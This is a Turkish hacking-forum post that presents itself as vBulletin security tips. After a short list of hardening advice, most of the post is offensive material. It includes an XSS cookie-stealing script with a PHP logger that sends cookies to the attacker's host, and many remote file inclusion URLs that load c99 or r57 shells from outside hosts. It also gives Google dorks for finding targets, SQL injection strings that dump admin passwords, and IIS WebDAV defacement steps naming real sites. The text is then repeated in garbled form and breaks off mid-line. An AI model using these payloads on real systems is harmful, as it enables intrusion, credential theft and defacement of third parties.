vBuLLetin GüvenLik AçıkLarı ve Kapama YoLLarı ve digerleri

**nOne** · 06-03-2009, 09:30 AM

1- İLk olarak her zaman için forumunuzu son çıkan vbulletin sürümüne upgrade edin daha güvenlidir.
2-Herhangi bi eklentide php dosyası veya php dosyalarında editleme varsa iyice dikkat edin sonradan açık teşkil edebilir.
3-Ftp nize girin ve tüm dosyalarının chmod değerlerinin 777 olmamasına dikkat edin çünkü fso ile serverınıza girilirse hacklenmeyin adam yazma hakkı bulamaz kurtulmuş olursunuz.
4- Config.php dosyanızı mutlaka kriptolayınki herhangi bi fso ile girildiğinde sql bağlantı için kimse okuyamasın.
5- Eğer phpmyadmin kullanıyorsanız phpmyadmin adresinizin şifreli olduğundan emin olun değilse şifreleyin.
6- Admincp ve modcp klasörlerinizin ismini değiştirin vede şifreleyin o klasörleri.
7-Çok basit şifreler kullanmayın şifrelerinizde &%+/ gibi özel karekterlerin olmasına özen gösterin
8-Trojen yerseniz mutlaka hemen format atın ve tüm ftp +panel v.s şifrelerinizi değiştirin
9-Forumu kurduktan sonra mutlaka install klasörünü silin sadece install.php yi değil zaten herhangi bir işlevi olmıyan klasör komple silin ileriki zamanlarda açık teşkil etmesin.
10-Mutlaka hergün sitenizin yedeğini alın herhangi bi sorunla karşılaşırsanız yedeği geri yükleyip ufak bir zararla atlatırsınız.
11- Calender(Takvim) i silin biri oraya Hacked by ****** gibisinden bişeyler ekliyerek lamerlik yapabilir.
12-Shoutbox kullanıyorsanız mutlaka html ve images ları kapatın bunlar açık teşkil ediyorlar.
13-Eğer yedeği ftp nize yollayıp ordan bilgisayarınıza çekiyorsanız yedek aldıktan sonra mutlaka ftp nizden silin çünkü yedek alınması için klasörün chmod u 777 dir ve isteyen herkez yedeği bilgisayarına indirebilir.
14- imzada html kodlarını kapatın bu yöntemle xss veya yönlendirme yapılabilir.
15- Üye olurken mutlaka resim doğrulaması olsun eğer hostunuzdan doğan bir image sorunu varsa herhangi zorunlu bir ek bilgi ekleyinki siteniz flood saldırısına maruz kalmasın.
16- Herhangi bi konuda TIKLA gibisinden yazılara direk tıklamayın önce sağ tıklayıp özelliklerden linke bakın ondan sonra tıklayın.
17-Özel mesajlarda çok özelliğin açık olmasına gerek yok cookieslerinizin güvenliği açısından özel mesajdaki özellikleri kapatın image v.s
18-Yeni kullanıcı grup eklerken bu uye grubu halka acık olsunmu seçeneğini mutlaka hayır yapın diğer kullanıcılar bu grubu seçemesin.
19-Eğer null sürüm kullanıyorsanız dosyalara dikkat edin null iyen kişi sizin bilgilerinize ulaşmak için açık kapı bırakmış olabilir ör: 3.5.3 sürümündeki sm-check.php dosyası.
20-eğer topx kullanıyor kullanıyorsanız yönlendirme yemediğinden emin olun herhangi biri indexine yönlendirebilir http://www.spyfunclub.org/kod.txt örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak açıksız topx ler var onu kullanın
21-Eğer toplistinizi eklenti olarak kullanıyosanız ör:http://www.spyfunclub.org/toplist.php html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir.
22- Gelelim eklentiden doğan xss açığına
Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.

Code:

<script>
d o c u m e n t.write('<img src="http://host adresiniz/c.php?c='+document.cookie+'" WIDTH=0 HEIGHT=0>');
document.location.href="https://www.google.com/ads ense/testmagic.pdf";
</script>
Aşağıdakini de c.php olarak kaydedip bir host a atın.

Code:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer= getenv ('HTTP_REFERER');
$fl = fopen('megalog.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n");
fclose($fl);
?>
Nasıl kullanılacağına geçelim :

vbulletin 3.5.4 kullanan bir foruma üye olup mesajımızı yazıyoruz. daha sonra yazdığımız mesaja testmagic.pdf i ekliyoruz. eğer o sitede açık varsa mesajı gören kullanıcıların cookie si hostunuzdaki log.txt e kaydedilecek.

Kodlardaki bazı adresler yerine biliyorsunuz ki kendi adreslerinizi yazacaksınız.Bu açık sadece IE kullananlarda geçerlidir.

işte eklentiden doğan xss açığı böyle kapatmak için pdf türü eklentiyi silmelisiniz

---------------------------------------------------------------

Jomla 1.5.0 Kullanicilari Hapi Yuttu sağlam açık

dosya ekleme açiği çikti joomla 1.5.0 da gözümüz aydin)
deneme için url: deneme.çom/libraries/pcl/pcltar.php?g_pcltar_lib_d ir=http://seladresiniz/sell.jpg?[/url]
Açık yenidir
Risk Faktoru yuksek
------------------------------------------------------------

Güncel Açıklar Bölümündeki RFI Açıklarını Etkili Kullanma

Örnek açığımız aşağıdaki gibidir :

Script : Mani Admin Plugin Stats Reader
Version : 1.2
Google araması : "2006 by www.mani-stats-reader.de.vu"
Saldırı Exploiti
Code
http://www.örneksiteadresi.com/Script Yolu/index.php?ipath=http://reqfer.by.ru/r57.txt?

-------------------------------------------------------

Scallywag RFİ Açığı

Dork:"Powered by Scallywag"

Exploit-1 : http://www.siteadi.com/path/skin/dar...late.php?path=[[Sh3LL Script]]

Exploit-2 : http://www.siteadi.com/path/skin/gol...late.php?path=[[Sh3LL Script]]

Exploit-3 : http://www.siteadi.com/path/skin/ori...late.php?path=[[Sh3LL Script]]

----------------------------------------------------------
Asp Sistem Portal Hack ( Videolu )

Yine Kolay Bir Hack Yöntemi..Umarım Videoyu İzleyince Anlarsınız..Gerekli Kodlar Dosyanın içinde..

Not : Bu tür siteler Türk sitesi olduğu için zarar vermeyiniz sitelere..(uyarı amaçlı kullanın)

indirme adresi : uploaded.to - Free File Hosting, Free Image Hosting, Free Music Hosting, Free Video Hosting, ...

Md5 Çözen Siteler ( Admin Şifresi Md5 Olarak Karşımıza Çıkcak Bu sİtelerden Faydalancaz Kırmak İçin )

------------------------------------------------
Güncel Açıkları Etkili Kullanabilme [Videolu]

Arkadaşlar sizler için video çektim BXCP = 0.3.0.4 team açığıyla exploitimizi çalıştırıcaz çok açık var.Exploit rar dosyasının içindedir.

indirme adresi : uploaded.to - Free File Hosting, Free Image Hosting, Free Music Hosting, Free Video Hosting, ...

-----------------------------------------------------
ISS Açığı ile 4 Adımda İndex Basma!

DERS 1

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
BU KOdları
başlat///çalıştır a yazın

DERS 2
Şimdi Web Klasörleri klasörü çıkacak.Klasörün herhangi bir yerinde mause’un sağ tuşuyla tıklayalım.Ardından "Yeni" sonrada "Web klasörü" diyelim."eklenecek konumu yazın" yazan yerin altındaki boşluğa şu siteleri yazabiliriz.
color=#0000cccolor=#0000ffwww.acore.com.tw
color=#0000cccolor=#0000ffwww.autoalliance.co.th
color=#0000cccolor=#0000ffwww.cckln.edu.hk
color=#0000cccolor=#0000ffwww.cescage.com.br
color=#0000cccolor=#0000ffwww.driving-school.com.au
color=#0000cccolor=#0000ffwww.fy.ah163.net
color=#0000cccolor=#0000ffwww.gbks.com.tr
color=#0000cccolor=#0000ffwww.golfsenior.com.br
color=#0000cccolor=#0000ffwww.greencotton.co.th
color=#0000cccolor=#0000ffwww.intradenver.net
color=#0000cccolor=#0000ffwww.jwpension.com
color=#0000cccolor=#0000ffwww.lakelandboating.com
color=#0000cccolor=#0000ffwww.level.com
color=#0000cccolor=#0000ffwww.myworld.com.tr
color=#0000cccolor=#0000ffwww.radiolina.it
color=#0000cccolor=#0000ffwww.rallycomms.co.uk
color=#0000cccolor=#0000ffwww.socialistasenred.org
color=#0000cccolor=#0000ffwww.tgm.co.th
color=#0000cccolor=#0000ffwww.vfb-huels.de
tabi sadece bunları değil başka siteleri de yazabilirsiniz. bunlar bir örnektir. Neyse
Herhangi birini yazdıktan sonra ileri diyelim ardından son’a basalım.Yazdğımız site orda gözükecek.Sonra çift tıklayarak eklediğimiz siteye girelim.

DERS 3
şimdi bu ders index le ilgili kendi indexinizi frontpage veya başka bir şekilde yapın kaydetin. uzantısı html olsun şimdi. adım 4 teyiz arkadaşlar

DERS 4 VE SON
Şimdi Web Folders Klasörüne Dönelim.Eğer İçerisi bomboş ise index.html dosyamızın ismini isminiz.html yapalım (mesela nickimiz cesurgursel ise cesurgursel.html yapalım öyle yaparsak color=#0000cccolor=#0000ffwww.siteninadı.com/cesur gursel.html adresine girdiğimizde bizim hazırladığımız index dosyasını görürüz) ve Web Folders da açmış olduğumuz siteye sürükleyerek gönderelim.Eğer içerde dosya var ise index in ismi aynen kalsın siz sadece sürükle yöntemiyle yollayın.(dosyalar çıkarsa direk color=#0000cccolor=#0000ffwww.siteismi.com adresine girdiğimizde bizim dosyayı görürüz)
Burada ıss açığı ile iki dakika da index atamayı öğrendik çok kolay bir yoldur. direk linkte çıkar.
evet arkadaşlar ıss açığı olan tüm sitelerde işe yarar tamam. iyi hackler...

Lutfen bir tşk çok görmeyelim - Emeğe saygı

--------------------------------------------------------------

flashchat V4.5.7 açığı

Evet kaldıysa gelsin hacklesin bi dene

Google arama kodu : flashchat V4.5.7

/inc/cmses/aedating4CMS.php?dir[inc]=http://shell.com/c99.txt?

Sitelerin sonunda bulunan flashchat.php silin bu kodu ekleyin kolay gelsin

shell adresiniz vardır herhalde cw

-------------------------------------------------------------------------------------
TROforum Scriptlerinde Uzaktan Kod Çağırma Güvenlik Açığı

Script : TROforum

Version : 0.1

Hasarlı kod : admin.php

Google Araması :"TROforum 0.1"

Saldırı şekli :

Örneksiteadresi/Script Yolu/admin/admin.php?site_url=http://sh3ladresiniz .txt?

--------------------------------------------------------------------------

phphtml v 0.6.4 Rfi

Website: Sitellite Enterprise PHP CMS

DOWNLOAD: SourceForge.net: PHP::HTML

FILE :

Code:
PATH\phphtml.phpEXPOLİT:

Code:
http://www.xxx.com\path\phphtml.php?...H3ll.txt?CODE: on line 19

Code:
<?

define (PHPHTML_VERSION, "0.6.4");

/* gettext is not implemented for now*/
=0;

/* We need to know where the PHP::HTML tree is installed.*/

if (strlen(chop())==0) =".";
if (==1)
{
if (function_exists("gettext"))
{
=1;
}
}

include("/ext.php"); /* Some extenstions to PHP */
include("/core.php"); /* PHP::HTML Core */
include("/xhtml.php"); /* XHTML extensions */
include("/xhtml_table.php"); /* XHTML tables extensions */
include("/xhtml_forms.php"); /* XHTML forms extensions */
include("/xhtml_doc.php"); /* XHTML document extension */
include("/wml.php"); /* WML extension */

/* Below is a debugging example */

/*
=new XHTML_doc("Hello");
echo ->render();
*/

yani anlatıyım şöyle oluyor

http://www.xxx.com\path\phphtml.php?...h=SH3ll. txt?

arkadaşlar site adını yazıp shell basacaksınız. cok zor deyil arama koduna gelince phpbb v 0.6.4 aratın cıkar

----------------------------------------------------------------------------------------------
Risk Faktörü:Orta

smf 1.1.2 deki acık

Product: Simple Machines Forum (SMF)
Affected version: 1.1.2 and prior
Remote-Exploit: yes
Vendor-URL: Home of SMF: Free PHP and MySQL forum software
Vendor-Status: informed
Advisory-Status: published

Credits
============
Discovered by: hackedbydeli
Spygrup.org - En iyi spy grup bilgi ve alim kaynaklar.

Original Advisory:
============
Spygrup.org - En iyi spy grup bilgi ve alim kaynaklar.

Introduction
============
"Simple Machines Forum ? SMF in short ? is a free, professional grade software package
that allows you to set up your own online community within minutes." -from simplemachines.org

More Details
============
1. Session fixation:
The "PHPSESSID" parameter can be set to a malicious and arbitrary value.

1.1 Description:
In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server.
After a user's session ID has been fixed, the attacker will wait for them to login.
Once the user does so, the attacker uses the predefined session ID value to assume their online identity.

Workaround:
============
1. Do not accept session identifiers from GET / POST variables.

2.Regenerate SID on each request.

3. Accept only server generated SID:
One way to improve security is to not accept session identifiers not generated by server.

if ( ! isset( $_SESSION['SERVER_GENERATED_SID'] ) ) {
session_destroy(); // destroy all data in session
}
session_regenerate_id(); // generate a new session identifier
$_SESSION['SERVER_GENERATED_SID'] = true;

History/Timeline
================
30.04.2007 discovery of the vulnerability
03.04.2007 contacted the vendor
04.04.2007 working patch sent to the vendor
05.04.2007 advisory is written
05.04.2007 advisory released
Not:Bu yazdıklarım sadece professionel kullanıcılar için gecerlidir

--------------------------------------------------------------------------------------------------------
bazı rfi açıkları

BinGo News <= 3.01 (bnrep)
Usage : http://sitename.com/[Script Path]/bp_ncom.php?bnrep=http://SHELLURL.COM?

Arama kodu:BinGo News 3.01
Aramada kodu powered by BinGo News 3.01
inurl:bp_ncom.php

şeklinde çoğaltabilirsiniz.Umarım açıklayıcı olabilmişimdir;

Socketwiz Bookmarks <= 2.0 (root_dir)
Usage : http://[site target]/[path]/smarty_config.php?root_dir=http://[shell anda].txt?

Vivvo Article Manager <= 3.2 (classified_path)
Usage : http://[target]/[path]/index.php?classified_path=http://[evil_script]?

MyABraCaDaWeb <= 1.0.3 (base)
Usage : http://www.site.com/[path]/index.php?base=[shell] atau http://www.site.com/[path]/pop.php?base=[shell]

Somery <= 0.4.6 (skin_dir)
Usage : http://[domain]/[path]/upload/admin/system/include.php?skindir=http://[url_inclusion_exploit]

PhpNews 1.0 (Include)
Usage : http://[Target]/[Path]/Include/lib.inc.php3?Include=http://[shell anda] atau http://[Target]/[Path]/Include/variables.php3?Include=http://[shell anda]

SL_Site <= 1.0 (spaw_root)
Usage : http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[Evil_Script]

PayProCart <= 1146078425 Multiple
Usage : http://[url]/index.php?proMod=http://shell.txt?

Beautifier 0.1 (Core.php)
Usage : http://[Target]/[Path]/Beautifier/Core.php?BEAUT_PATH=http://[shell ente]?

BinGo News <= 3.01 (bnrep)
Usage : http://sitename.com/[Script Path]/bp_ncom.php?bnrep=http://SHELLURL.COM?

phpBB Shadow Premod <= 2.7.1
Usage : http://www.site.com/[path]/includes/functions_portal.php?phpbb_root_path=[Evil_Script]

phpFullAnnu <= 5.1 (repmod)
Usage : http://sitename.com/[Script Path]/modules/home.module.php?repmod=http://SHELLURL.CO M?

Akarru <= 0.4.3.34 (bm_content)
Usage : http://www.site.com/[path]/akarru.gui/main_content.php?bm_content=[she

---------------------------------------------------------------------------------------------------------

ASP Sitelerin DB'lerin Indir / Kriptolu Şifreleri Bul !

Gerekli olanlar

Google arama kodu

Code:
allinurlroddetail.asp?prod=

Default mb yolu

fpdb/vsproducts.mdb

Admin girişi

vsadmin/login.asp

--------------------------------------------------------------------------------------------------------------

vBulletin 3.6.5 Scriptinde SQL Injection Güvenlik Açığı

Script : vBulletin

Version : 3.6.5

Saldırı şekli :

Code:
Hedefsite/Script Yolu/misc.php?sub=profile&name=0\\\\\\')+UNION+SEL ECT+0 ,pass,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_use rs%

------------------------------------------------------------------------------------------------------------

X-ice Haber Script'i Admin K.Adı ve Şifresi Sql Enj. [Md5 Değil!]

- Site : ?

- Sql : devami.asp?id=-1%20union%20select%201,kullaniciadi,sifre,1,1,1,1, 1%20from%20admin

- Konu : X-ice Haber Script'i Sql Enjeksiyon.

- Google araması : inurl:default.asp?Xsayfa=

- Admin Paneli : /admin

---------------------------------------------------------------------------------------------------------------------
Zen Cart Açığı [Garanti] Kendi Geliştirdiğim Arama Kodu

Normalde açık vardı fakat arama yapıldığında sitelerin az çıktığından.Yeni bi arama kodu gelistirdim.
Arama Kodu : "Zen Cart!, The Art of E-commerce" ("" lar yok)
Exploit:
index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell adresi?

------------------------------------------------------------------------------------------------------------------

PHPBandManager Index.PHP RFİ Açığı.

Uzaktan: Yes Yerel: No Yayınlanması: Apr 26 2007 12:00AM Güncellemesi: Apr 26 2007 10:40PM Kim Buldu: koray Etkilenen: phpBandManager phpBandManager 0.8

Exploit:
http://www.example.com/suite/index.p...st.com/c99. txt?

Kaynak: http://www.securityfocus.com/bid/23673

Google araması: http://www.google.com.tr/search?hl=t...%3Fpg%3D&** **=

-------------------------------------------------------------------------------------------------------------------------------

Mini Nuke v2.3 Hack

Google.Com'a Girin "Copyright © 2004 Mini-NUKE v2.3 " Yazin Cikan Sitelerin Sonuna

pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+ from+members+where+uye_id=1

Bu Kodu Ekleyin Direk Adminin Md5'li Sifresine Ulasiyorsunuz...
www.milw0rm.com/ Dan KıraBilirsiniz Ama Bazen Kırılmıyo

-------------------------------------------------------------------------------------------------------------------------------

Powered by PHP Live- Genelde Host Şirketleri Kullanılıyor

Google Arama : Powered by PHP Live! v3.1 © OSI Codes Inc.
Saldırı Şekli:
http://www.hedefsite.com/phplive/hel...7shell131.t xt?

Aradaşlar genelde host şirketleri kullanıyor bu scripti destek için süper bi açık ben 2 server buldum

------------------------------------------------------------------------------------------------------------

PHP-Ring Webring System 0.9

Portal.......: uPHP_ring_website
Tür.........: Sql Injection Attack

index.php?ring=Sql.Inject

index.php?ring=-1/**/UNION/**/SELECT/**/0,admin_uname,admin_pass/* */FROM/**/ring_admins/*

index.php?ring=-1/**/UNION/**/SELECT/**/0,USER_NAME,USER_PASS,1,2, 3/**/FROM/**/ring_users/

06-03-2009, 09:30 AM	#1
nOne Webmaster \| Webmaster Rehberi \| Webmaster Forum \| Webmaster Araçları \| Google Forum Üyelik tarihi: Mar 2009 Bulunduğu yer: GoogLe Amca`dan :o) Yaş: 33 Mesajlar: 895 Tecrübe Puanı: 2000004	vBuLLetin GüvenLik AçıkLarı ve Kapama YoLLarı ve digerleri 1- İLk olarak her zaman için forumunuzu son çıkan vbulletin sürümüne upgrade edin daha güvenlidir. 2-Herhangi bi eklentide php dosyası veya php dosyalarında editleme varsa iyice dikkat edin sonradan açık teşkil edebilir. 3-Ftp nize girin ve tüm dosyalarının chmod değerlerinin 777 olmamasına dikkat edin çünkü fso ile serverınıza girilirse hacklenmeyin adam yazma hakkı bulamaz kurtulmuş olursunuz. 4- Config.php dosyanızı mutlaka kriptolayınki herhangi bi fso ile girildiğinde sql bağlantı için kimse okuyamasın. 5- Eğer phpmyadmin kullanıyorsanız phpmyadmin adresinizin şifreli olduğundan emin olun değilse şifreleyin. 6- Admincp ve modcp klasörlerinizin ismini değiştirin vede şifreleyin o klasörleri. 7-Çok basit şifreler kullanmayın şifrelerinizde &%+/ gibi özel karekterlerin olmasına özen gösterin 8-Trojen yerseniz mutlaka hemen format atın ve tüm ftp +panel v.s şifrelerinizi değiştirin 9-Forumu kurduktan sonra mutlaka install klasörünü silin sadece install.php yi değil zaten herhangi bir işlevi olmıyan klasör komple silin ileriki zamanlarda açık teşkil etmesin. 10-Mutlaka hergün sitenizin yedeğini alın herhangi bi sorunla karşılaşırsanız yedeği geri yükleyip ufak bir zararla atlatırsınız. 11- Calender(Takvim) i silin biri oraya Hacked by ****** gibisinden bişeyler ekliyerek lamerlik yapabilir. 12-Shoutbox kullanıyorsanız mutlaka html ve images ları kapatın bunlar açık teşkil ediyorlar. 13-Eğer yedeği ftp nize yollayıp ordan bilgisayarınıza çekiyorsanız yedek aldıktan sonra mutlaka ftp nizden silin çünkü yedek alınması için klasörün chmod u 777 dir ve isteyen herkez yedeği bilgisayarına indirebilir. 14- imzada html kodlarını kapatın bu yöntemle xss veya yönlendirme yapılabilir. 15- Üye olurken mutlaka resim doğrulaması olsun eğer hostunuzdan doğan bir image sorunu varsa herhangi zorunlu bir ek bilgi ekleyinki siteniz flood saldırısına maruz kalmasın. 16- Herhangi bi konuda TIKLA gibisinden yazılara direk tıklamayın önce sağ tıklayıp özelliklerden linke bakın ondan sonra tıklayın. 17-Özel mesajlarda çok özelliğin açık olmasına gerek yok cookieslerinizin güvenliği açısından özel mesajdaki özellikleri kapatın image v.s 18-Yeni kullanıcı grup eklerken bu uye grubu halka acık olsunmu seçeneğini mutlaka hayır yapın diğer kullanıcılar bu grubu seçemesin. 19-Eğer null sürüm kullanıyorsanız dosyalara dikkat edin null iyen kişi sizin bilgilerinize ulaşmak için açık kapı bırakmış olabilir ör: 3.5.3 sürümündeki sm-check.php dosyası. 20-eğer topx kullanıyor kullanıyorsanız yönlendirme yemediğinden emin olun herhangi biri indexine yönlendirebilir http://www.spyfunclub.org/kod.txt örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak açıksız topx ler var onu kullanın 21-Eğer toplistinizi eklenti olarak kullanıyosanız ör:http://www.spyfunclub.org/toplist.php html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir. 22- Gelelim eklentiden doğan xss açığına Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin. Code: <script> d o c u m e n t.write('<img src="http://host adresiniz/c.php?c='+document.cookie+'" WIDTH=0 HEIGHT=0>'); document.location.href="https://www.google.com/ads ense/testmagic.pdf"; </script> Aşağıdakini de c.php olarak kaydedip bir host a atın. Code: <?php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("m/d/Y g:i:s a"); $referer= getenv ('HTTP_REFERER'); $fl = fopen('megalog.txt', 'a'); fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n"); fclose($fl); ?> Nasıl kullanılacağına geçelim : vbulletin 3.5.4 kullanan bir foruma üye olup mesajımızı yazıyoruz. daha sonra yazdığımız mesaja testmagic.pdf i ekliyoruz. eğer o sitede açık varsa mesajı gören kullanıcıların cookie si hostunuzdaki log.txt e kaydedilecek. Kodlardaki bazı adresler yerine biliyorsunuz ki kendi adreslerinizi yazacaksınız.Bu açık sadece IE kullananlarda geçerlidir. işte eklentiden doğan xss açığı böyle kapatmak için pdf türü eklentiyi silmelisiniz --------------------------------------------------------------- Jomla 1.5.0 Kullanicilari Hapi Yuttu sağlam açık dosya ekleme açiği çikti joomla 1.5.0 da gözümüz aydin) deneme için url: deneme.çom/libraries/pcl/pcltar.php?g_pcltar_lib_d ir=http://seladresiniz/sell.jpg?[/url] Açık yenidir Risk Faktoru yuksek ------------------------------------------------------------ Güncel Açıklar Bölümündeki RFI Açıklarını Etkili Kullanma Örnek açığımız aşağıdaki gibidir : Script : Mani Admin Plugin Stats Reader Version : 1.2 Google araması : "2006 by www.mani-stats-reader.de.vu" Saldırı Exploiti Code http://www.örneksiteadresi.com/Script Yolu/index.php?ipath=http://reqfer.by.ru/r57.txt? ------------------------------------------------------- Scallywag RFİ Açığı Dork:"Powered by Scallywag" Exploit-1 : http://www.siteadi.com/path/skin/dar...late.php?path=[[Sh3LL Script]] Exploit-2 : http://www.siteadi.com/path/skin/gol...late.php?path=[[Sh3LL Script]] Exploit-3 : http://www.siteadi.com/path/skin/ori...late.php?path=[[Sh3LL Script]] ---------------------------------------------------------- Asp Sistem Portal Hack ( Videolu ) Yine Kolay Bir Hack Yöntemi..Umarım Videoyu İzleyince Anlarsınız..Gerekli Kodlar Dosyanın içinde.. Not : Bu tür siteler Türk sitesi olduğu için zarar vermeyiniz sitelere..(uyarı amaçlı kullanın) indirme adresi : uploaded.to - Free File Hosting, Free Image Hosting, Free Music Hosting, Free Video Hosting, ... Md5 Çözen Siteler ( Admin Şifresi Md5 Olarak Karşımıza Çıkcak Bu sİtelerden Faydalancaz Kırmak İçin ) ------------------------------------------------ Güncel Açıkları Etkili Kullanabilme [Videolu] Arkadaşlar sizler için video çektim BXCP = 0.3.0.4 team açığıyla exploitimizi çalıştırıcaz çok açık var.Exploit rar dosyasının içindedir. indirme adresi : uploaded.to - Free File Hosting, Free Image Hosting, Free Music Hosting, Free Video Hosting, ... ----------------------------------------------------- ISS Açığı ile 4 Adımda İndex Basma! DERS 1 %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F} BU KOdları başlat///çalıştır a yazın DERS 2 Şimdi Web Klasörleri klasörü çıkacak.Klasörün herhangi bir yerinde mause’un sağ tuşuyla tıklayalım.Ardından "Yeni" sonrada "Web klasörü" diyelim."eklenecek konumu yazın" yazan yerin altındaki boşluğa şu siteleri yazabiliriz. color=#0000cccolor=#0000ffwww.acore.com.tw color=#0000cccolor=#0000ffwww.autoalliance.co.th color=#0000cccolor=#0000ffwww.cckln.edu.hk color=#0000cccolor=#0000ffwww.cescage.com.br color=#0000cccolor=#0000ffwww.driving-school.com.au color=#0000cccolor=#0000ffwww.fy.ah163.net color=#0000cccolor=#0000ffwww.gbks.com.tr color=#0000cccolor=#0000ffwww.golfsenior.com.br color=#0000cccolor=#0000ffwww.greencotton.co.th color=#0000cccolor=#0000ffwww.intradenver.net color=#0000cccolor=#0000ffwww.jwpension.com color=#0000cccolor=#0000ffwww.lakelandboating.com color=#0000cccolor=#0000ffwww.level.com color=#0000cccolor=#0000ffwww.myworld.com.tr color=#0000cccolor=#0000ffwww.radiolina.it color=#0000cccolor=#0000ffwww.rallycomms.co.uk color=#0000cccolor=#0000ffwww.socialistasenred.org color=#0000cccolor=#0000ffwww.tgm.co.th color=#0000cccolor=#0000ffwww.vfb-huels.de tabi sadece bunları değil başka siteleri de yazabilirsiniz. bunlar bir örnektir. Neyse Herhangi birini yazdıktan sonra ileri diyelim ardından son’a basalım.Yazdğımız site orda gözükecek.Sonra çift tıklayarak eklediğimiz siteye girelim. DERS 3 şimdi bu ders index le ilgili kendi indexinizi frontpage veya başka bir şekilde yapın kaydetin. uzantısı html olsun şimdi. adım 4 teyiz arkadaşlar DERS 4 VE SON Şimdi Web Folders Klasörüne Dönelim.Eğer İçerisi bomboş ise index.html dosyamızın ismini isminiz.html yapalım (mesela nickimiz cesurgursel ise cesurgursel.html yapalım öyle yaparsak color=#0000cccolor=#0000ffwww.siteninadı.com/cesur gursel.html adresine girdiğimizde bizim hazırladığımız index dosyasını görürüz) ve Web Folders da açmış olduğumuz siteye sürükleyerek gönderelim.Eğer içerde dosya var ise index in ismi aynen kalsın siz sadece sürükle yöntemiyle yollayın.(dosyalar çıkarsa direk color=#0000cccolor=#0000ffwww.siteismi.com adresine girdiğimizde bizim dosyayı görürüz) Burada ıss açığı ile iki dakika da index atamayı öğrendik çok kolay bir yoldur. direk linkte çıkar. evet arkadaşlar ıss açığı olan tüm sitelerde işe yarar tamam. iyi hackler... Lutfen bir tşk çok görmeyelim - Emeğe saygı -------------------------------------------------------------- flashchat V4.5.7 açığı Evet kaldıysa gelsin hacklesin bi dene Google arama kodu : flashchat V4.5.7 /inc/cmses/aedating4CMS.php?dir[inc]=http://shell.com/c99.txt? Sitelerin sonunda bulunan flashchat.php silin bu kodu ekleyin kolay gelsin shell adresiniz vardır herhalde cw ------------------------------------------------------------------------------------- TROforum Scriptlerinde Uzaktan Kod Çağırma Güvenlik Açığı Script : TROforum Version : 0.1 Hasarlı kod : admin.php Google Araması :"TROforum 0.1" Saldırı şekli : Örneksiteadresi/Script Yolu/admin/admin.php?site_url=http://sh3ladresiniz .txt? -------------------------------------------------------------------------- phphtml v 0.6.4 Rfi Website: Sitellite Enterprise PHP CMS DOWNLOAD: SourceForge.net: PHP::HTML FILE : Code: PATH\phphtml.phpEXPOLİT: Code: http://www.xxx.com\path\phphtml.php?...H3ll.txt?CODE: on line 19 Code: <? define (PHPHTML_VERSION, "0.6.4"); /* gettext is not implemented for now/ =0; / We need to know where the PHP::HTML tree is installed./ if (strlen(chop())==0) ="."; if (==1) { if (function_exists("gettext")) { =1; } } include("/ext.php"); / Some extenstions to PHP / include("/core.php"); / PHP::HTML Core / include("/xhtml.php"); / XHTML extensions / include("/xhtml_table.php"); / XHTML tables extensions / include("/xhtml_forms.php"); / XHTML forms extensions / include("/xhtml_doc.php"); / XHTML document extension / include("/wml.php"); / WML extension / / Below is a debugging example / / =new XHTML_doc("Hello"); echo ->render(); / yani anlatıyım şöyle oluyor http://www.xxx.com\path\phphtml.php?...h=SH3ll. txt? arkadaşlar site adını yazıp shell basacaksınız. cok zor deyil arama koduna gelince phpbb v 0.6.4 aratın cıkar ---------------------------------------------------------------------------------------------- Risk Faktörü:Orta smf 1.1.2 deki acık Product: Simple Machines Forum (SMF) Affected version: 1.1.2 and prior Remote-Exploit: yes Vendor-URL: Home of SMF: Free PHP and MySQL forum software Vendor-Status: informed Advisory-Status: published Credits ============ Discovered by: hackedbydeli Spygrup.org - En iyi spy grup bilgi ve alim kaynaklar. Original Advisory: ============ Spygrup.org - En iyi spy grup bilgi ve alim kaynaklar. Introduction ============ "Simple Machines Forum ? SMF in short ? is a free, professional grade software package that allows you to set up your own online community within minutes." -from simplemachines.org More Details ============ 1. Session fixation: The "PHPSESSID" parameter can be set to a malicious and arbitrary value. 1.1 Description: In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server. After a user's session ID has been fixed, the attacker will wait for them to login. Once the user does so, the attacker uses the predefined session ID value to assume their online identity. Workaround: ============ 1. Do not accept session identifiers from GET / POST variables. 2.Regenerate SID on each request. 3. Accept only server generated SID: One way to improve security is to not accept session identifiers not generated by server. if ( ! isset( $_SESSION['SERVER_GENERATED_SID'] ) ) { session_destroy(); // destroy all data in session } session_regenerate_id(); // generate a new session identifier $_SESSION['SERVER_GENERATED_SID'] = true; History/Timeline ================ 30.04.2007 discovery of the vulnerability 03.04.2007 contacted the vendor 04.04.2007 working patch sent to the vendor 05.04.2007 advisory is written 05.04.2007 advisory released Not:Bu yazdıklarım sadece professionel kullanıcılar için gecerlidir -------------------------------------------------------------------------------------------------------- bazı rfi açıkları BinGo News <= 3.01 (bnrep) Usage : http://sitename.com/[Script 